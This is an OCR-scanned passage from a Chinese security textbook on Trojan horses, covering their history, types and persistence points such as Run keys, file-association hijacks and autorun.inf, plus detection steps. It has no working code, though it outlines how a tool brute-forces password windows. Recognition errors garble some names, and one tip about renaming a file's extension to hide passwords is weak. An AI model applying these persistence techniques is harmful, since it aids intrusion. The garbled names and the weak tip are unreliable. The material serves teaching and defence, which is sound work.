无 法 使 用 、 使 用 受 限 、 受 到 远程 控制 和 数据 全 部 丢失 等 。 据 统计 分 析 ,浏览 器 配置 被 修改 、 网 
络 无 法 使 用 和 数据 丢失 等 破坏 最 为 常见 。 
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7.3 ”特洛伊 木马 


7.3.1 特洛伊 木马 的 定义 


特洛伊 木马 (Torjan horse, 简 称 木马 ) 是 一 个 具有 伪装 能 力 、 隐 项 执行 非法 功能 的 恶意 
程序 ,而 受害 用 户 表面 上 看 到 的 是 合法 功能 执行 。 

特洛伊 木马 取 自古 希腊 神话 “木马 屠城 记 ”, 已 成 为 黑客 常用 的 攻击 方法 , 它 通 过 伪装 成 
合法 程序 或 文件 , 植 人 系统 ,对 网 络 系统 安全 构成 严重 威胁 。 谋 取经 济 利益 是 其 根本 目的 。 

一 个 完整 的 特洛伊 木马 程序 包含 了 两 部 分 : 服务 端 (服务 器 部 分 ) 和 客户 端 ( 控 制 器 部 
分 )。 植 人 对 方 计算 机 的 是 服务 端 ,而 黑客 则 是 利用 客户 端 进入 运行 了 服务 端的 计算 机 。 运 
行 了 木马 程序 的 服务 端 会 产生 一 个 容易 迷惑 用 户 的 名 称 的 进程 ,暗中 打开 端口 ,向 指定 地 点 
发 送 数据 (如 网 络 游戏 的 密码 、 实 时 通信 软件 密码 ` 用 户 上 网 密码 等 ) ,黑客 甚至 可 以 利用 这 
些 打开 的 端口 进入 计算 机 系统 。 此 时 计算 机 中 的 各 种 文件 ,程序 ,计算 机 中 使 用 的 账号 、 密 
码 就 无 安全 可 言 了 。 攻 击 者 能 不 同 程度 地 远程 控制 受到 特洛伊 木马 侵害 的 计算 机 ,例如 访 
问 受害 计算 机 、 在 受害 计算 机 中 执行 命令 或 利用 受害 计算 机 进行 DDoS 攻击 。 

特洛伊 木马 不 会 自动 运行 , 它 是 暗含 在 某 些 用 户 感 兴趣 的 文件 中 ,用 户 下 载 时 附带 的 。 
当 用 户 运行 文档 程序 时 ,特洛伊 木马 才 会 运行 ,信息 或 文档 才 会 被 破坏 和 丢失 。 

同 计算 机 病毒 、 网 络 蠕虫 相 比较 ,特洛伊 木马 不 具有 自我 传播 能 力 , 它 的 特点 是 伪装 成 
实用 工具 软件 ` 流 行 游戏 .具有 诱惑 力 的 图 像 , 诱 使 用 户 将 其 下 载 到 PC 端 或 者 服务 器 上 ,从 
而 秘密 获取 信息 。 

特洛伊 木马 和 后 门 不 一 样 ,后 门 指 隐藏 在 程序 中 的 秘密 功能 ,通常 是 程序 设计 者 为 了 能 
在 日 后 随意 进入 系统 而 设置 的 。 

木马 和 计算 机 病毒 都 是 一 种 人 为 的 程序 ,都 属于 恶意 软件 。 计 算 机 病毒 的 作用 是 破坏 
计算 机 的 资料 数据 ,除了 破坏 之 外 其 他 无 非 就 是 有 些 病毒 制造 者 为 了 达到 某 些 目 的 而 进行 
的 威慑 和 敲诈 勒索 的 作用 ,或 为 了 炫 焰 自 己 的 技术 。 木 马 的 作用 是 偷偷 监视 别人 和 盗窃 别 
人 密码 .数据 等 ,达到 偷 羔 别人 隐私 和 获取 经 济 利益 的 目的 。 所 以 木马 比 早期 的 计算 机 病毒 
更 加 有 用 ,更 能 够 直接 达到 使 用 者 的 目的 ! 这 就 是 目前 网 上 大 量 木马 泛滥 成 灾 的 原因 。 鉴 
于 木马 的 这 些 巨 大 危害 和 它 与 早期 病毒 的 作用 性 质 不 一 样 ,所 以 将 木马 单独 从 恶意 软件 中 
剥离 出 来 ,独立 称 为 木马 。 

木马 不 是 一 种 病毒 ,但 可 以 和 最 新 病毒 .漏洞 利用 工具 一 起 使 用 ,几乎 可 以 躲 过 各 大 杀 
毒 软件 。 这 是 因为 杀毒 软件 理论 上 包含 了 对 木马 的 查 杀 功能 .但 因为 查 杀 病毒 速度 是 比较 
慢 的 ,每 个 文件 要 经 过 近 10 万 个 病毒 代码 库 的 检验 ,因此 往往 把 查 杀 木马 程序 单独 剥离 出 
来 加 入 到 防火 墙 软件 中 ,这 样 就 可 以 省 去 普通 病毒 代码 检验 ,提高 专门 查 杀 木马 的 效率 。 

防火 墙 软件 可 以 有 效果 地 防止 木马 和 黑客 的 入 侵 , 不 过 它 不 是 杀毒 软件 ,如 果 要 防御 和 
查 杀 木马 以 外 的 病毒 的 话 还 要 用 杀毒 软件 ,所 以 计算 机 中 通常 都 会 同时 安装 防火 墙 软件 和 
杀毒 软件 。 

1. 木马 发 展 历程 

最 原始 的 木马 程序 主要 是 简单 的 密码 窃取 ,通过 电子 邮件 发 送信 息 等 ,具备 了 木马 最 基 
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本 的 功能 。 至 今 木马 程序 已 经 经 历 了 6 代 的 改进 。 

第 一 代 木 马 : 伪装 型 病毒 。 这 种 病毒 通过 伪装 成 一 个 合法 性 程序 诱骗 用 户 上 当 。 世 界 
上 第 一 个 计算 机 木马 是 出 现在 1986 年 的 PC-Write 木马 。 它 伪装 成 共享 软件 PC-Write 的 
2.72 版 本 (事实 上 ,编写 PC-Write 的 Quicksoft 公司 从 未 发 行 过 2. 72 版 本 ) ,一 旦 用 户 信 以 
为 真 运行 该 木马 程序 ,那么 他 的 下 场 就 是 硬盘 被 格式 化 。 此 时 的 第 一 代 木 马 还 不 具备 传染 
特征 。 

第 二 代 木 马 : AIDS 型 木马 。1989 年 出 现 了 AIDS 木马 ,由 于 当时 很 少 有 人 使 用 电子 邮 
件 , 所 以 AIDS 的 作者 就 利用 现实 生活 中 的 邮件 进行 散播 : 给 其 他 人 寄 去 一 封 封 含有 木马 
程序 软盘 的 邮件 ,之 所 以 叫 这 个 名 称 是 因为 软盘 中 包含 有 AIDS 和 HIV 疾病 的 药品 、 价 格 、 
预防 措施 等 相关 信息 。 软 盘 中 的 木马 程序 在 运行 后 ,虽然 不 会 破坏 数据 ,但 是 会 将 硬盘 加 密 
锁 死 ,然后 提示 受 感染 用 户 花 钱 消 灾 。 可 以 说 第 二 代 木 马 已 具备 了 传播 特征 (尽管 是 通过 传 
统 的 邮递 方式 ) 。 

第 三 代 木 马 : 网 络 传播 型 木马 。 随 着 Internet 的 普及 ,这 一 代 木 马 兼备 伪装 和 传播 两 
种 特征 并 结合 TCP/IP 网 络 技术 四 处 泛滥 。 同 时 它 还 有 新 的 特征 : 

(1) 添加 了 后 门 功能 。 所 谓 后 门 , 就 是 一 种 可 以 为 计算 机 系统 秘密 开启 访问 入 口 的 程 
序 。 一 旦 被 安装 ,这 些 程序 就 能 够 使 攻击 者 绕 过 安全 程序 进入 系统 。 该 功能 的 目的 就 是 收 
集 系统 中 的 重要 信息 ,例如 ,财务 报告 .口令 及 信用 卡号 。 此 外 ,攻击 者 还 可 以 利用 后 门 控制 
系统 ,使 之 成 为 攻击 其 他 计算 机 的 帮凶 。 由 于 后 门 是 隐藏 在 系统 背后 运行 的 ,因此 很 难 被 检 
测 到 。 它 们 不 像 病毒 和 蠕虫 那样 通过 消耗 内 存 而 引起 注意 。 

(2) 添加 了 击 键 记录 功能 。 该 功能 主要 是 记录 用 户 所 有 的 击 键 内 容 然 后 形成 击 键 记录 
的 日 志文 件 发 送 给 恶意 用 户 。 恶 意 用 户 可 以 从 中 找到 用 户 名 ,口令 以 及 信用 卡号 等 用 户 
信息 。 

这 一 代 木 马 比较 有 名 的 有 国外 的 BO2000(BackOrifice) 和 国内 的 冰河 木马 。 它 们 有 如 
下 共同 特点 : 基于 网 络 的 客户 端 /服务 器 应 用 程序 .具有 搜集 信息 ,执行 系统 命令 、 重 新 设置 
机 器 、 重 新 定向 等 功能 。 

当 木 马 程序 攻击 得 手 后 ,计算 机 就 完全 成 为 黑客 控制 的 俐 偶 主 机 ,黑客 成 了 超级 用 户 ， 
用 户 的 所 有 计算 机 操作 不 但 没有 任何 秘密 而 言 , 而 且 黑 客 可 以 远程 控制 侧 偶 主机 对 别 的 主 
机 发 动 攻击 ,这 时 候 被 俘获 的 俐 偶 主 机 就 成 了 黑客 进行 进一步 攻击 的 挡 箭 牌 和 跳板 。 

这 一 代 木 马 的 主要 改进 在 数据 传递 技术 方面 ,出 现 了 ICMP 等 类 型 的 木马 ,利用 畸形 报 
文 传递 数据 ,增加 了 查 杀 识别 的 难度 。 

第 四 代 木 马 在 进程 隐藏 方面 有 了 很 大 改动 ,采用 了 内 核 插入 的 嵌入 方式 ,利用 远程 插入 
线程 技术 .嵌入 DLL 线程 ; 或 者 挂 接 PSAPI, 实 现 木 马 程序 的 隐藏 。 灰 名 子 和 蜜蜂 大 次 是 
比较 出 名 的 DLL 木马 。 

木马 程序 常常 与 DLL 文件 息息相关 ,也 被 称 为 DLL 木马 。DLL 木马 的 技术 特点 是 使 
用 了 线程 插入 技术 ,线程 插入 技术 是 指 将 自己 的 代码 嵌入 正在 运行 的 进程 中 的 技术 。 

理论 上 说 ,在 Windows 中 的 每 个 进程 都 有 自己 的 私有 内 存 空间 , 别 的 进程 是 不 允许 对 
这 个 私有 空间 进行 操作 的 ,但 实际 上 ,我 们 仍然 可 以 利用 种 种 方法 进入 并 操作 进程 的 私有 内 
存 , 因 此 也 就 拥有 了 与 那个 远程 进程 相当 的 权限 。 无 论 怎样 ,都 是 让 木马 的 核心 代码 运行 于 
别 的 进程 的 内 存 空 间 ,这 样 不 仅 能 很 好 地 隐藏 自己 ,也 能 更 好 地 保护 自己 。 
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DLL 不 能 独立 运行 ,所 以 要 想 让 木马 * 跑 ?起 来 ,就 需要 一 个 EXE 文件 使 用 动态 嵌 和 人 技 
术 让 DLL 搭 上 其 他 正常 进程 的 车 ,让 被 嵌入 的 进程 调用 这 个 DLL 的 DIMain 函数 ,激发 森 
马 运行 ,最 后 启动 木马 的 EXE 文件 ,木马 启动 完毕 。 

启动 DLL 木马 的 EXE 文件 是 个 重要 角色 , 它 被 称 为 Loader，Loader 可 以 是 多 种 多 样 
的 ,Windows 的 Rundll32. exe 也 被 一 些 DLL 木马 用 来 作为 Loader, 这 种 木马 一 般 不 带动 
态 诅 入 技术 , 它 直 接 注入 Rundll32 进程 运行 ,即使 “ 杀 掉 ”了 Rundll32 进程 ,木马 本 体 还 是 
存在 的 。 

利用 这 种 方法 除了 可 以 启动 木马 ,不 少 应 用 程序 也 采用 了 这 种 启动 方式 ,一 个 最 常 
见 的 例子 是 3721 网 络 实名 。 在 一 台 安 装 了 网 络 实名 的 计算 机 中 运行 注册 表 编 辑 器 , 依 
次 展开 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Windows\CurrentVersion\ 
Run, 可 发 现 一 个 名 为 CnsMin 的 启动 项 ,其 键 值 为 Rundll32 C: \WINDOWS\Downlo~1\ 
CnsMin. dll, Rundll32。CnsMin. dll 是 网 络 实名 的 DLL 文件 ,这 样 就 通过 Rundll32 命令 实 
现 了 网 络 实名 的 功能 。 

第 五 代为 驱动 级 森马。 驱动 级 木马 多 数 都 使 用 了 大 量 的 Rootkit 技术 来 达到 深度 隐藏 
的 效果 ,并 深入 到 内 核 空间 ,感染 后 针对 杀毒 软件 和 网 络 防 火 墙 进行 攻击 ,可 将 系统 SSDT 
初始 化 ,导致 杀毒 防火 墙 失 去 效应 。 有 的 驱动 级 木马 可 驻 留 BIOS, 并 且 很 难 查 杀 。 

第 六 代 , 随 着 身份 认证 USBKey 和 杀毒 软件 主动 防御 的 兴起 , 黏 虫 技术 类 型 和 特殊 反 
显 技术 类 型 木马 逐渐 开始 系统 化 。 前 者 主要 以 盗 取 和 算 改 用 户 敏 感 信息 为 主 ,后 者 以 动态 
口令 和 硬 证 书 攻击 为 主 。PassCopy 和 上 暗黑 蜂 蛛 侠 是 这 类 木马 的 代表 。 

根据 特洛伊 木马 的 管理 方式 来 分 析 ,特洛伊 木马 可 以 分 为 : 

(1) 本 地 特洛伊 木马 。 早 期 的 一 类 木马 ,特点 是 木马 只 运行 在 本 地 的 单 台 主 机 ,木马 没 
有 远程 通信 功能 ,木马 的 攻击 环境 是 多 用 户 的 UNIX 系统 ,典型 例子 就 是 盗用 口令 的 木马 。 

(2) 网 络 特洛伊 木马 。 指 具有 网 络 通信 连接 及 服务 功能 的 一 类 木马 ,简称 网 络 木马 。 
此 类 木马 由 两 部 分 组 成 , 即 远程 木马 控制 管理 和 木马 代理 ,其 中 远程 木马 控制 管理 主要 是 监 
测 木马 代理 的 活动 ,远程 配置 管理 代理 ,收集 木马 代理 窃取 的 信息 ; 而 木马 代理 则 是 植 入 到 
目标 系统 中 ,伺机 获取 目标 系统 的 信息 或 控制 目标 系统 的 运行 ,类 似 于 网 络 管理 代理 。 网 络 
木马 已 成 为 目前 的 主要 类 型 。 

根据 功能 ,特洛伊 木马 可 以 分 为 : 

(1) 破坏 型 。 唯 一 的 功能 就 是 破坏 并 且 删 除 文件 ,可 以 自动 删除 计算 机 上 的 DLL INI、 
EXE 等 重要 文件 。 

(2) 密码 发 送 型 。 可 以 找到 隐藏 密码 并 把 它们 发 送 到 指定 的 信箱 。 有 人 喜欢 把 自己 的 
各 种 密码 以 文件 的 形式 存放 在 计算 机 中 ,认为 这 样 方便 ; 还 有 人 喜欢 用 Windows 提供 的 密 
码 记 忆 功 能 ,这 样 就 可 以 不 必 每 次 都 输入 密码 了 。 许多 黑客 软件 却 可 以 寻找 到 这 些 文件 ,把 
它们 送 到 黑客 手中 。 也 有 些 黑客 软件 长 期 潜伏 ,记录 操作 者 的 键盘 操作 ,从 中 寻找 有 用 的 
密码 。 

在 这 里 提醒 一 下 ,如果 认为 自己 在 文档 中 加 了 密码 而 把 重要 的 保密 文件 存在 公用 计算 
机 中 也 可 以 , 那 你 就 大 错 特 错 了 。 别 有 用 心 的 人 完全 可 以 用 穷 举 法 暴力 破译 你 的 密码 。 方 
法 是 利用 Windows API 函数 EnumWindows 和 EnumChildWindows 对 当前 运行 的 所 有 程 
序 的 所 有 窗口 (包括 控件 进行 遍历 ,通过 窗口 标题 查找 密码 输入 和 确认 重新 输入 窗口 ,通过 
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按钮 标题 查找 应 该 单 击 的 按钮 ,通过 ES_PASSWORD 查找 需要 输入 的 密码 窗口 。 向 密码 
输入 窗口 发 送 WM_SETTEXT 消息 模拟 输入 密码 ,向 按钮 窗口 发 送 WM_COMMAND 消 
息 模拟 单 击 。 在 破解 过 程 中 ,把 密码 保存 在 一 个 文件 中 ,以 便 用 下 一 个 序列 的 密码 再 次 进行 
穷 举 或 在 多 台 机 器 上 同时 进行 分 工 穷 举 , 直 到 找到 密码 为 止 。 此 类 程序 在 黑客 网 站 上 唾 手 
可 得 ,精通 程序 设计 的 人 ,完全 可 以 自 编 一 个 。 

如 果真 的 想 将 账号 密码 存储 在 计算 机 里 ,可 以 先 将 数据 写 在 TXT 文件 里 ,再 将 后 级 名 
改 成 . 17864( 或 者 随便 输入 ) ,这 可 以 最 大 限度 地 防止 黑客 的 入 侵 。 需 要 用 的 时 候 青 将 后 级 
名 改过 来 。 

(3) 远程 访问 型 。 最 广泛 的 是 特洛伊 木马 ,只 需 有 人 运行 了 服务 端 程序 ,如 果 客 户 知道 
了 服务 端的 IP 地 址 ,就 可 以 实现 远程 控制 。 

这 类 程序 可 以 实现 观察 “受害 者 ”正在 干什么 ,这 一 功能 完全 可 以 用 于 正常 目的 ,比如 监 
视 学 生机 的 操作 。 这 类 程序 中 使 用 UDP, 与 TCP 不 同 , 它 是 一 种 非 连接 的 传输 协议 ,没有 
确认 机 制 ,可 靠 性 不 如 TCP, 但 它 的 效率 却 比 TCP 高 ,用 于 远程 屏幕 监视 还 是 比较 适合 的 。 
它 不 区 分 服务 器 端 和 客户 端 ,只 区 分 发 送 端 和 接收 端 ,编程 上 较为 简单 。 具 体 可 使 用 
DELPHI 提供 的 TNMUDP 控件 。 

(4) 键盘 记录 木马 。 这 种 特洛伊 木马 是 非常 简单 的 。 它 们 只 做 一 件 事情 ,就 是 记录 受 
害 者 的 键盘 敲 击 并 且 在 LOG 文件 里 查找 密码 。 

这 种 特洛伊 木马 随 着 Windows 的 启动 而 启动 。 它 们 有 在 线 和 离线 记录 这 样 的 选项 , 顾 
名 思 义 ,它们 分 别 记 录 你 在 在 线 和 离线 状态 下 在 键盘 上 的 按键 情况 。 也 就 是 说 ,你 按 过 什么 
按键 ,木马 程序 都 知道 ,从 这 些 按键 中 他 很 容易 就 会 得 到 你 的 密码 甚至 信用 卡 账 号 等 有 用 信 
息 。 当 然 ,对 于 这 种 类 型 的 木马 ,邮件 发 送 功能 也 是 必 不 可 少 的 。 

(5) DoS 攻击 木马 。 随 着 DoS 攻击 越 来 越 广泛 的 应 用 ,被 用 作 DoS 攻击 的 木马 也 越 来 
越 流 行 起 来 。 当 你 入 侵 了 一 台 机 器 ,并 种 上 DoS 攻击 木马 ,那么 日 后 这 台 计 算 机 就 成 为 进 
行 DoS 攻击 的 最 得 力 助手 了 。 你 控制 的 “肉鸡 "数量 越 多 ,发动 DoS 攻击 取得 成 功 的 几率 就 
越 大 。 所 以 ,这 种 木马 的 危害 不 是 体现 在 被 感染 计算 机 上 ,而 是 体现 在 攻击 者 可 以 利用 它 来 
攻击 一 台 又 一 台 计 算 机 ,给 网 络 造成 很 大 的 伤害 和 带 来 损失 。 

还 有 一 种 类 似 DoS 的 木马 叫做 邮件 炸弹 木马 ,一旦 机 器 被 感染 ,木马 就 会 随机 生成 各 
种 各 样 主题 的 信件 ,对 特定 的 邮箱 不 停 地 发 送 邮件 ,一 直到 对 方 瘫痪 、 不 能 接收 邮件 为 止 。 

(6) 代理 木马 。 黑 客 在 入 侵 的 同时 掩盖 自己 的 足迹 ,谨防 别人 发 现 自己 的 身份 是 非常 
重要 的 ,因此 ,给 被 控制 的 “肉鸡 ”种 上 代理 木马 ,让 其 变 成 攻击 者 发 动 攻击 的 跳板 就 是 代理 
木马 最 重要 的 任务 。 通 过 代理 木马 ,攻击 者 可 以 在 匿名 的 情况 下 使 用 Telnet\ICQ IRC 等 
程序 ,从 而 隐蔽 自己 的 踪迹 。 

(7) FTP 木马 。 这 种 木马 可 能 是 最 简单 和 古老 的 木马 了 , 它 的 唯一 功能 就 是 打开 21 端 
口 ,等 待 用 户 连接 。 新 FTP 木马 还 加 上 了 密码 功能 ,这 样 ,只 有 攻击 者 本 人 才 知 道 正 确 的 密 
码 ,从 而 进入 对 方 的 计算 机 。 

(8) 程序 杀手 木马 。 上 面 的 木马 功能 虽然 形形色色 ,不 过 到 了 对 方 机 器 上 要 发 挥 自 己 
的 作用 ,还 要 过 防 木 马 软 件 这 一 关 才 行 。 常 见 的 防 木马 软件 有 ZoneAlarm、 Norton Anti- 
Virus 等 。 程 序 杀 手 木马 的 功能 就 是 关闭 对 方 机 器 上 运行 的 这 类 程序 ,让 其 他 的 木马 更 好 
地 发 挥 作用 。 
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(9) 反弹 端口 型 木马 。 木 马 开 发 者 在 分 析 了 防火 墙 的 特性 后 发 现 : 防火 墙 对 于 连 入 的 
链接 往往 会 进行 非常 严格 的 过 滤 , 但 是 对 于 连 出 的 链接 却 牙 于 防范 。 于 是 ,与 一 般 的 木马 相 
反 , 反 弹 端 口 型 木马 的 服务 端 (被 控制 端 ) 使 用 主动 端口 ,客户 端 ( 控 制 端 ) 使 用 被 动 端口 。 

木马 定时 监测 控制 端的 存在 ,发 现 控制 端 上 线 立 即 弹出 端口 主动 连接 控制 端 打开 的 主 
动 端口 ; 为 了 隐蔽 起 见 ,控制 端的 被 动 端口 一 般 开 在 80 。 

2. 特洛伊 木马 防范 措施 

(1) 最 简单 的 查 杀 木马 的 方法 是 安装 个 人 防火 墙 软件 ,现在 个 人 防火 墙 软件 都 能 删除 
常见 的 木马 。 

(2) 端口 扫描 。 端 口 扫描 是 检查 远程 机 器 有 无 木马 的 最 好 办 法 ,但 对 于 驱动 程序 /动态 
链接 木马 ,端口 扫描 是 不 起 作用 的 。 

(3) 查看 连接 。 端 口 扫 描 和 查看 连接 原理 基本 相同 ,不 过 是 在 本 机 上 通过 netstat - a 查 
看 所 有 的 TCP/1P 连接 ,查看 连接 要 比 端口 扫描 快 ,但 同样 无 法 查 出 驱动 程序 /动态 链接 木马 ， 
而 且 仅 可 在 本 地 使 用 。 

(4) 查看 注册 表 。 由 于 木马 可 以 通过 注册 表 启 动 ,那么 ,我 们 同样 可 以 通过 检查 注册 表 
来 发 现 木 马 在 注册 表 里 留 下 的 痕迹 。 

(5) 查找 文件 。 查 找 木马 特定 的 文件 也 是 一 个 常用 的 方法 ,如 冰河 木马 的 一 个 特征 文 
件 是 kern132. exe, 另 一 个 是 sysexlpr. exe, 只 要 删除 了 这 两 个 文件 ,木马 就 不 起 作用 了 。 但 
也 要 注意 ,在 对 注册 表 进 行 修改 时 ,要 做 好 备份 ,如 果 进 行 了 错误 的 修改 ,还 可 以 进行 恢复 。 


7.3.2 网 络 木 马 


1. 网 络 木 马 的 构成 

网 络 木 马 由 硬件 部 分 、 软 件 部 分 .具体 连接 部 分 组 成 。 

(1) 硬件 部 分 : 建立 木马 连接 所 必需 的 硬件 实体 。 

控制 端 : 对 服务 端 进行 远程 控制 的 一 方 ; 

服务 端 : 被 控制 端 远程 控制 的 一 方 ; 

Internet: 控制 端 对 服务 端 进行 远程 控制 .数据 传输 的 网 络 载体 。 

(2) 软件 部 分 : 实现 远程 控制 所 必需 的 软件 程序 。 

控制 端 程序 : 控制 端 用 以 远程 控制 服务 端的 程序 ; 

木马 程序 : 潜入 服务 端 内 部 ,获取 其 操作 权限 的 程序 ; 

木马 配置 程序 : 设置 木马 程序 的 端口 号 、 触 发 条 件 , 木 马 名 称 等 ,使 其 在 服务 端 藏 得 更 
隐蔽 的 程序 。 

(3) 具体 连接 部 分 : 通过 Internet 在 服务 端 和 控制 端 之 间 建 立 一 条 木马 通道 所 必需 的 
元 素 。 控 制 端 IP、 服 务 端 IP: 即 控制 端 \ 服 务 端 的 网 络 地 址 ,也 是 木马 进行 数据 传输 的 目的 
地 。 控 制 端 端口 .木马 端口 : 即 控制 端 ,服务 端的 数据 入 口 ,通过 这 个 入 口 ,数据 可 直达 控制 
端 程序 或 木马 程序 。 

2. 网 络 木 马 的 基本 运行 机 制 

(1) 寻找 攻击 目标 。 攻 击 者 通过 互联 网 或 其 他 方式 搜索 潜在 的 攻击 目标 。 

(2) 收集 目标 系统 的 信息 ,包括 操作 系统 类 型 .网 络 结 构 、 应 用 软件 和 用 户 习 惯 等 。 
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(3) 将 木马 植 人 目标 系统 。 攻 击 者 根据 所 搜集 到 的 信息 ,分 析 目 标 系统 的 脆弱 性 ,制定 
植 人 木马 策略 。 木 马 植 和 的 途径 有 很 多 ,如 通过 网 页 点 击 ,执行 电子 邮件 等 。 

(4) 木马 隐藏 。 为 实现 攻击 意图 ,木马 会 设法 隐藏 其 行为 ,包括 目标 系统 隐藏 .本 地 活 
动 隐藏 和 远程 通信 隐蔽 。 

(5) 实现 攻击 意图 , 即 激活 木马 ,实施 攻击 。 木 马 被 植 人 系统 , 待 触 发 条 件 满 足 后 ,就 进 
行 攻击 破坏 活动 ,如 窃取 口令 .远程 访问 和 删除 文件 等 。 

3. 网 络 木马 入 侵 过 程 

1) 配置 木马 

一 般 来 说 ,一 个 设计 成 熟 的 木马 都 有 木马 配置 程序 ,从 具体 的 配置 内 容 看 ,主要 是 为 了 
实现 以 下 两 方面 功能 。 

(1) 木马 伪装 : 木马 配置 程序 为 了 在 服务 端 尽 可 能 地 隐藏 木马 ,会 采用 多 种 伪装 手段 ， 
如 修改 图 标 、 拥 绑 文 件 、. 定 制 端口 自我 销毁 等 。 

(2) 信息 反馈 : 木马 配置 程序 将 就 信息 反馈 的 方式 或 地 址 进行 设置 ,如 设置 信息 反馈 
的 邮件 地 址 IRC 号 ICO 号 等 。 

2) 传播 木马 

木马 的 传播 方式 主要 有 两 种 : 一 种 是 通过 E-mail, 控 制 端 将 木马 程序 以 附件 的 形式 来 
在 邮件 中 发 送出 去 , 收 信 人 只 要 打开 附件 系统 就 会 感染 木马 ; 另 一 种 是 软件 下 载 , 一 些 非 正 
规 的 网 站 以 提供 软件 下 载 的 名 义 , 将 木马 捆绑 在 软件 安装 程序 上 ,下 载 后 只 要 运行 这 些 程 
序 ,木马 就 会 自动 安装 。 

3) 运行 木马 

服务 端 用 户 运 行 木马 或 捆绑 木马 的 程序 后 ,木马 就 会 自动 进行 安装 。 首 先 将 自身 复制 
到 Windows 的 系统 文件 夹 中 (C: WINDOWS 或 C: WINDOWS\SYSTEM 目录 下 ), 然 后 
在 注册 表 、 启 动 组 、 非 启动 组 中 设置 木马 的 触发 条 件 , 完 成 木马 安装 。 

安装 后 就 可 以 启动 木马 了 ,启动 方式 有 以 下 4 种 。 

(1) 自 启 动 激 活 木马 。 触 发 自 启动 木马 ,大 致 有 下 面 6 个 地 方 。 

O 注册 表 : 打开 HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersion 
下 以 Run 和 RunServices 命名 的 主键 ,在 其 中 寻找 可 能 是 启动 木马 的 键 值 。 

@ WIN.INI: C: WINDOWS 目录 下 有 一 个 配置 文件 win. ini, 用 文本 方式 打开 ,在 
[windows] 字 段 中 有 启动 命令 load 王 和 run= ,在 一 般 情况 下 是 空白 的 ,如 果 有 启动 程序 , 则 
可 能 是 木马 。 

@ SYSTEM. INI: C: WINDOWS 目录 下 有 个 配置 文件 system. ini, 用 文本 方式 打开 
它 ,在 [386Enhj]、Lmeij、\Ldrivers32] 中 有 命令 行 ,在 其 中 寻找 木马 的 启动 命令 。 

@ Autoexec. bat 和 Config. sys。 在 C 盘 根 目录 下 的 这 两 个 文件 也 可 以 启动 木马 。 但 
这 种 加 载 方式 一 般 都 需要 控制 端 用 户 与 服务 端 建立 连接 后 ,将 已 添加 木马 启动 命令 的 同名 
文件 上 传 到 服务 端 覆盖 这 两 个 文件 才 行 。 

@ .ini: 即 应 用 程序 的 启动 配置 文件 ,控制 端 利用 这 些 文件 能 启动 程序 的 特点 ,将 制作 
好 的 带 有 木马 启动 命令 的 同名 文件 上 传 到 服务 端 覆盖 这 同名 文件 ,这 样 就 可 以 达到 启动 木 
马 的 目的 了 。 

@ 启动 菜单 : 在 “开始 ”|“ 程 序 ”I1 “启动 ”选项 下 也 可 能 有 木马 的 触发 条 件 。 
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(2) 触发 式 激活 木马 。 打 开 注册 表 中 HKEY_CLASSES_ROOT 文件 类 型 \shellopenco 
mmand 主键 ,查看 其 键 值 。 例 如 ,国产 木马 “冰河 ”就 是 修改 HKEY_CLASSES_ROOT 
xtfileshellopencommand 下 的 键 值 ,将 C: WINDOWS NOTEPAD. EXE %1 改 为 C: WIND- 
OWSSYSTEMSYXXXPLR. EXE %1, 此 时 双击 一 个 TXT 文件 后 ,原本 应 用 NOTEPAD 
打开 文件 ,现在 却 变 成 启动 木马 程序 了 。 还 要 说 明 的 是 ,不 仅 是 TXT 文件 ,通过 修改 
HTML、EXE、ZIP 等 文件 的 启动 命令 的 键 值 都 可 以 启动 木马 。 

(3) 捆绑 文件 。 实 现 这 种 触发 条 件 首先 要 控制 端 和 服务 端 已 通过 木马 建立 连接 ,然后 
控制 端 用 户 用 工具 软件 将 木马 文件 和 某 一 应 用 程序 捆绑 在 一 起 ,然后 上 传 到 服务 端 履 盖 原 
文件 ,这 样 即使 木马 被 删除 了 ,只 要 运行 捆绑 了 木马 的 应 用 程序 ,木马 又 会 被 安装 。 

(4) 自动 播放 式 。 自 动 播 放 本 是 用 于 光盘 的 , 当 插入 一 个 电影 光盘 到 光驱 时 ,系统 会 自 
动 播放 里 面 的 内 容 , 这 就 是 自动 播放 的 本 意 ,播放 什么 是 由 光盘 中 的 AutoRun. inf 文件 指 
定 的 ,修改 AutoRun. inf 中 的 open 一 行 可 以 指定 在 自动 播放 过 程 中 运行 的 程序 。 

后 来 有 人 将 此 方法 用 在 了 硬盘 或 U 盘 , 在 U 盘 或 硬盘 的 分 区 创建 Autorun. inf 文件 ， 
并 在 open 中 指定 木马 程序 ,这 样 当 打开 硬盘 分 区 或 U 盘 时 ,就 会 触发 木马 程序 的 运行 。 

木马 被 激活 后 进入 内 存 , 并 开启 事先 定义 的 木马 端口 ,准备 与 控制 端 建立 连接 。 这 时 服 
务 端 用 户 可 以 在 MS-DOS 方式 下 ,输入 NETSTAT -AN 查看 端口 状态 。 一 般 个 人 计算 机 
在 脱 机 状态 下 是 不 会 有 端口 开放 的 ,如 果 有 端口 开放 ,就 要 注意 是 否 感染 木马 了 。 

在 上 网 过 程 中 要 下 载 软件 ,发 送信 件 、 网 上 聊天 等 必然 打开 一 些 端 口 , 下 面 是 一 些 常 用 
的 端口 : FTP 使 用 21; SMTP 使 用 25; POP3 使 用 110; 4000 端口 是 OICQ 的 通信 端口 ; 
6667 端口 是 IRC 的 通信 端口 。 

除 上 述 的 端口 外 ,如 发 现 还 有 其 他 端口 打开 ,尤其 是 数值 比较 大 的 端口 ,就 要 怀疑 是 否 
感染 了 木马 。 当 然 如 果木 马 有 定制 端口 的 功能 ,那么 任何 端口 都 有 可 能 是 木马 端口 。 

4) 信息 泄露 

一 般 来 说 ,设计 成 熟 的 木马 都 有 一 个 信息 反馈 机 制 。 

所 谓 信 息 反 馈 机 制 ,是 指 木马 成 功 安装 后 会 收集 一 些 服务 端的 软 硬 件 信 息 ,并 通过 
E-mail、IRC 或 ICO 的 方式 告知 控制 端 用 户 。 从 反馈 信息 中 控制 端 可 以 知道 服务 端的 一 些 
软 硬 件 信息 ,包括 使 用 的 操作 系统 、 系 统 目录 硬盘 分 区 况 、 系 统 口 令 等 ,在 这 些 信息 中 ,最 重 
要 的 是 服务 端 IP, 因 为 只 有 得 到 这 个 参数 ,控制 端 才 能 与 服务 端 建立 连接 。 

5) 建立 连接 

一 个 木马 连接 建立 必须 满足 两 个 条 件 : 一 是 服务 端 已 安装 了 木马 程序 ; 二 是 控制 端 、 
